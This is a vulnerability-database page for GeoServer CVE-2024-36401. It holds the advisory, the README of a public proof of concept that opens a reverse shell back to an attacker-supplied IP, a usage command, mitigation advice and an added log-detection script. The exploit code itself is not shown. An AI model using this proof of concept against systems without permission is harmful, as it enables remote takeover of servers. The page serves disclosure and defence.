Associated Vulnerability
Title: Remote Code Execution (RCE) vulnerability in evaluating property name expressions in GeoServer (CVE-2024-36401)

Description: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library, which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well, which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided, but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
Description
POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vulnerable targets.
Readme
# RCE for CVE-2024-36401
POC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.

## Overview
POC for CVE-2024-36401: RCE for GeoServer versions prior to 2.25.1, 2.24.3 and 2.23.5. This POC is based on the security advisory by [phith0n](https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401).
## How it Works
1. Sets up a listener on your machine for the incoming reverse shell from the target.
2. Sends a POST request carrying the payloads.
3. Attempts to establish a shell on the target server.
4. This technique assumes `nc` is installed on the target.
## How to Use
This POC will attempt to establish a reverse shell from the vulnerable targets. It is aimed at vulnerable Linux targets. You will need a machine with a published and accessible IP address in order to run this POC.
### Minimum Requirements
- Python 3.6 or higher
- `requests` library
To use this POC against a single target:
```sh
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
```
Help:
```sh
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
```
## How to Protect Your GeoServer Appliance
1. Disable WFS requests.
2. Harden the Linux host with iptables so that unexpected outbound (reverse) connections are blocked: set default policies to drop all traffic, allow established and related connections, and permit only essential outbound traffic such as DNS, HTTP, and HTTPS.
3. Alternatively, upgrade to the latest version of GeoServer.
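A defender-side check that follows from the advisory above, added here as an example and not part of the PoC repository: it flags GeoServer OGC requests whose property-name parameters are not plain attribute names (the root cause is that such names were evaluated as XPath), and reports whether a GeoServer version is at or past the fixed releases. The parameter names checked and the allowlist pattern are assumptions; the log lines are constructed.

```python
"""Log check for CVE-2024-36401: a property name in a GeoServer request
should be a plain attribute name, never an expression."""
import re
from urllib.parse import urlsplit, parse_qsl

# Fixed releases from the advisory; branches older than 2.22 received no fix.
PATCHED = {(2, 22): 6, (2, 23): 6, (2, 24): 4, (2, 25): 2}

# Allowlist: optional namespace prefix plus attribute name, e.g. "the_geom", "sf:cat".
PLAIN_NAME = re.compile(r"^[A-Za-z_][\w\-.]*(:[A-Za-z_][\w\-.]*)?$")

# Assumed set of WFS parameters that carry property names (WFS 1.x / 2.0).
PROPERTY_PARAMS = {"propertyname", "valuereference"}


def is_patched(version: str) -> bool:
    """True if this GeoServer version is at or beyond the fixed release of its branch."""
    parts = [int(p) for p in version.split(".")] + [0, 0]
    major, minor, patch = parts[:3]
    if (major, minor) in PATCHED:
        return patch >= PATCHED[(major, minor)]
    return (major, minor) > (2, 25)  # newer branches shipped fixed, older ones did not


def suspicious_property_names(log_lines):
    """Return (line_no, parameter, value) for each property-name value in a
    /geoserver/ request URL that does not look like a plain attribute name."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if "/geoserver/" not in url.path.lower():
            continue
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() in PROPERTY_PARAMS:
                for name in raw.split(","):
                    if not PLAIN_NAME.match(name.strip()):
                        hits.append((n, key, name.strip()))
    return hits


# Constructed sample lines (not real traffic): a normal GetFeature, then one
# whose property name is clearly not an attribute name.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2024:10:00:00 +0000] "GET /geoserver/wfs?service=WFS&version=1.0.0&request=GetFeature&typeName=sf:archsites&propertyName=the_geom,cat HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jul/2024:10:00:07 +0000] "GET /geoserver/wfs?service=WFS&version=1.0.0&request=GetFeature&typeName=sf:archsites&propertyName=not_a_name(x) HTTP/1.1" 200 411',
]

if __name__ == "__main__":
    for hit in suspicious_property_names(SAMPLE_LOG):
        print("line %d: %s=%r is an expression, not a property name" % hit)
```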
## Contact
For any suggestions or thoughts, please get in touch with [me](https://x.com/MohamedNab1l).
## Disclaimer
I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.
File Snapshot
[4.0K] /data/pocs/17ac9fbc0128242800ea403237e8d2dcbf39eacc
├── [8.9K] cve-2024-36401.py
├── [2.1K] README.md
└── [4.0K] screens
└── [259K] screen.jpg
1 directory, 3 files